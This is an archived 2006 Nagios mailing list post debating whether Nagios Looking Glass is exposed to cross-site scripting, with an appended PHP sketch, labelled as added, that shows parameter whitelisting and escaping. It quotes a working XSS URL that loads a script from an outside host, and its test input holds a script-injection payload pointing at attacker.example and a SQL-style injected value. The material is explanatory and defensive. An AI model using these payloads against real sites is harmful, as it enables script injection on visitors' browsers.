ANNOUNCE: Nagios Looking Glass 1.0.0#PRE is here!

Andy Shellam (Mailing Lists) andy.shellam-lists at mailnetwork.co.uk
Thu Dec 28 20:24:03 CET 2006


Okay, I've just been reading up on XSS attacks, and from what I can 
gather it's similar in essence to SQL injection attacks.

This link is an example:

http://www.bbc.co.uk/bbcone/listings/index.shtml?service_id=4223&DAY=today%22%3E%3Cscript%20src=http://www.securitylab.ru/test/sc.js%3E%3C/script%3E%3C!--

From what I gather, most XSS attacks are script injections, or injections 
where external data (i.e. a GET variable) is changed; in the above case a 
<script ...></script> tag has been inserted.
In which case NLG is not vulnerable to these types of attacks, as it does 
not send, verbatim, any GET variables. The four variables it uses, "fid, 
gid, sid, and view", are only used to request further information (e.g. 
'view' tells NLG which view to render: server status, network status, 
or server summary; 'sid' is a server sequence, so 0 gets the first 
alphabetical server, 1 gets the second server, etc., and the same for the 
group/filter). It never returns the variable value to print verbatim in 
the page.

Also, with the confirmation that the poller does check the variables 
before using them, I think NLG isn't going to suffer.

If anyone fancies cracking it and showing me how it can be done, I'll do 
everything in my power to fix it, but with the addition of the 
client-side checking of the variables before passing them off to the 
poller, I'll maintain it's not at risk.

Thanks,

Andy.

Robert Hajime Lanning wrote:
> <quote who="Andy Shellam (Mailing Lists)">
>   
>>  From the client-side, the URL that's built in the JavaScript comes
>> out to:
>>
>> "?view=server&fid=1&gid=3"
>>
>> That's the most info you'll get out of the JS - pass that to the
>> s3_client.php page and you'll get an un-styled, plain format of the
>> page that's rendered when you click on a "Server" link.
>> What benefit is there (to a normal user or a hacker) of wanting to
>> change the fid and gid?  They do nothing except choose which data you
>> want to get back to the client front-end.
>>     
>
> It might not be a security issue to NLG, but passing any variable
> back to the client, unsanitized, is an opening for cross-site
> scripting (XSS).  This is where an attacker feeds the URL for
> your site (including the bad data) to an unknowing client, which
> then receives the bad data as part of the returned web page from
> your site.
>
> It is usually an attack directly on the web browser, or on another
> site, relayed by your site.
>
> So, ALL variables that contain data from outside the server
> environment must be sanitized before use.  This is why Perl has
> its "taint" mode, where all variables that contain external
> data are "tainted" until sanitized through substitutions and the
> like, and it gives errors if a "tainted" variable is used
> before being sanitized.
>
> In PHP, you have to be aware, as it does not have a "taint"-like
> mode.
>
>   


-- 
Andy Shellam
NetServe Support Team

the Mail Network
"an alternative in a standardised world"

p: +44 (0) 121 288 0832/0839
m: +44 (0) 7818 000834
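Added example, not part of the original thread and not NLG's own code: a PHP sketch of the server-side handling Robert describes, written against the four NLG-style parameters (view, fid, gid, sid). The constant and function names (ALLOWED_VIEWS, nlg_read_params, render_vulnerable, render_hardened) and the attacker host are hypothetical, and the $attack array is constructed to have the same shape as the BBC URL quoted above. Note that the attacker hands the crafted URL straight to the victim's browser, so the JavaScript that builds "?view=server&fid=1&gid=3" is never involved; only what s3_client.php does with the raw query string matters.

```php
<?php
// Added example (hypothetical names, not NLG code): treat the NLG-style GET
// parameters as selectors so that no query-string text reaches the page verbatim.
declare(strict_types=1);

// The only views that exist. Anything else is rejected, never echoed.
const ALLOWED_VIEWS = ['server', 'network', 'summary'];

/**
 * Validate view/fid/gid/sid from a query-string array such as $_GET.
 * Returns each value cleaned, or null if it failed validation. The raw
 * strings are never kept: integers are rebuilt with a cast after a
 * digits-only check, and the view is accepted only when it equals a
 * whitelist entry exactly.
 */
function nlg_read_params(array $get): array
{
    $clean = ['view' => null, 'fid' => null, 'gid' => null, 'sid' => null];

    if (isset($get['view']) && in_array($get['view'], ALLOWED_VIEWS, true)) {
        $clean['view'] = $get['view'];
    }
    foreach (['fid', 'gid', 'sid'] as $name) {
        // ctype_digit rejects "-1", "1e3", "3 OR 1=1" and any script payload.
        if (isset($get[$name]) && is_string($get[$name]) && ctype_digit($get[$name])) {
            $clean[$name] = (int) $get[$name];
        }
    }
    return $clean;
}

// The pattern Robert warns about: the GET value is pasted into the markup
// unchanged, so a value carrying '"><script ...' becomes part of the page.
function render_vulnerable(array $get): string
{
    $view = $get['view'] ?? 'server';
    return "<h1>View: $view</h1>";
}

// Hardened: only a whitelist entry is printed, and it is still HTML-escaped
// so a later change to the whitelist cannot quietly reintroduce injection.
function render_hardened(array $get): string
{
    $p = nlg_read_params($get);
    if ($p['view'] === null) {
        return '<h1>Unknown view</h1>';
    }
    return '<h1>View: ' . htmlspecialchars($p['view'], ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</h1>';
}

// Constructed attacker input (URL-decoded form of the payload shape above).
$attack = [
    'view' => '"><script src=http://attacker.example/sc.js></script><!--',
    'fid'  => '1',
    'gid'  => '3 OR 1=1',
];

echo render_vulnerable($attack), PHP_EOL;   // raw value reflected into the markup
echo render_hardened($attack), PHP_EOL;     // whitelist miss, generic page instead
var_dump(nlg_read_params($attack));         // cleaned selectors, raw strings dropped
```

Run it with `php` on the command line and compare the two lines of output. The property worth checking is that nothing in nlg_read_params returns a string taken from the request: fid comes back as an integer, gid and view come back as null, so the hardened renderer can only ever emit a whitelist entry or the "Unknown view" page, whatever the attacker put in the URL.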


_______________________________________________
Nagios-users mailing list
Nagios-users at lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/nagios-users
::: Please include Nagios version, plugin version (-v) and OS when reporting any issue. 
::: Messages without supporting info will risk being sent to /dev/null